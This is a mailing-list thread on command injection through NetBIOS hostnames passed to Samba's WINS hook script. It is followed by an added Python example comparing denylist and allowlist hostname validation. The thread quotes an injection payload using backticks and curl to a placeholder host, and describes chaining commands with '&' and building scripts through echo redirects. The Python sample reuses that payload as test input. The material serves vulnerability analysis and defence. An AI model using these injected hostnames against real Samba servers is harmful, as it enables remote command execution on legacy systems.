On 10/15/25 20:39, Douglas Bagnall wrote:
> On 16/10/25 12:30, Caveney, Seamus G wrote:
>
>> Illegal characters in a NetBIOS hostname are:
>>
>> \ / : * ? " < > | ,
>>
>> notably excluding backticks and semicolons. I'm not deeply familiar
>> with the Samba code base but a glance at nbtname.c and winsserver.c
>> seems to suggest that those character limitations aren't enforced at
>> the protocol level, so it might be possible to use pipes, redirects
>> or exec a local binary with a short path. Otherwise, the easiest
>> exploitable payload I can think of would be:
>>
>> ;`curl ab.cd`;
>
> The characters '<', ';', and '>' are blocked by the needs of the ldb
> database that this server uses (I am not sure I checked '`', but it is
> probably allowed). But of course '&' works just as well as ';'.
>
> If '>' worked, I think you could build up a script with a lot of
> "&echo foo>>x&" followed by a `tr`.
>
>> I'd be interested to see if anybody has a living Samba install
>> configured as a DC with WINS still running in 2025.
>
> Me too!
>
> The last indication of a 'wins hook' line I have seen was in 2016, and
> that was commented out.
>
> An example of a place that may use it is a factory where some machinery
> is a few decades old and only knows WINS but otherwise still works well.
>
> cheers,
> Douglas
These machines also often use SMB1 to fetch files. Samba's SMB1 support avoids having to use an EOL Windows version. The security concerns of SMB1 are mitigated by using a dedicated network or VLAN and physical access controls.

-- 
Sincerely,
Demi Marie Obenour (she/her/hers)
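The thread turns on the gap between what NetBIOS forbids in a name and what a shell would interpret if a 'wins hook' script received that name unquoted. The following is an added example (not from the thread, not Samba code) that puts the two checks side by side: a denylist built from the illegal-character list quoted above, which is the check a hook author might naively write, and a conservative allowlist a hook operator could apply instead. The sample names are constructed, apart from the payload quoted in the thread.

```python
import re

# Characters NetBIOS itself forbids in a hostname (the list from the thread).
NETBIOS_ILLEGAL = set('\\/:*?"<>|,')

# Characters an unquoted POSIX shell command line would treat specially.
# Only '<', '>', '|', '"' and '\\' overlap with NETBIOS_ILLEGAL; the backtick,
# ';', '&', '$' and parentheses are legal NetBIOS characters. The thread notes
# that ldb additionally rejects '<', ';' and '>', but not '&' or the backtick.
SHELL_META = set('`;&|$()<>\'"\\ \t\n')

# Allowlist an operator could enforce before a name reaches a hook script:
# letters, digits and hyphen only, 1 to 15 characters (the NetBIOS name limit).
ALLOWED = re.compile(r'[A-Za-z0-9-]{1,15}')


def netbios_illegal_chars(name):
    """Characters of `name` that NetBIOS forbids outright."""
    return sorted(c for c in set(name) if c in NETBIOS_ILLEGAL)


def shell_meta_chars(name):
    """Characters of `name` a shell would interpret if the name is unquoted."""
    return sorted(c for c in set(name) if c in SHELL_META)


def denylist_accepts(name):
    """Denylist check: length limit plus 'no NetBIOS-illegal characters'."""
    return 1 <= len(name) <= 15 and not netbios_illegal_chars(name)


def allowlist_accepts(name):
    """Allowlist check: the whole name must match ALLOWED."""
    return ALLOWED.fullmatch(name) is not None


def audit(name):
    """Compare both checks and list the shell metacharacters the name carries."""
    return {
        'denylist': denylist_accepts(name),
        'allowlist': allowlist_accepts(name),
        'shell_meta': shell_meta_chars(name),
    }


if __name__ == '__main__':
    # Constructed samples plus the payload quoted in the thread.
    for sample in ('PRINTER01', 'FACTORY-PLC7', 'x&echo hi&', ';`curl ab.cd`;'):
        print(repr(sample), audit(sample))
```

Names carrying '&' or backticks pass the denylist but fail the allowlist, which is the point: the NetBIOS character rules were never a shell-safety boundary.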
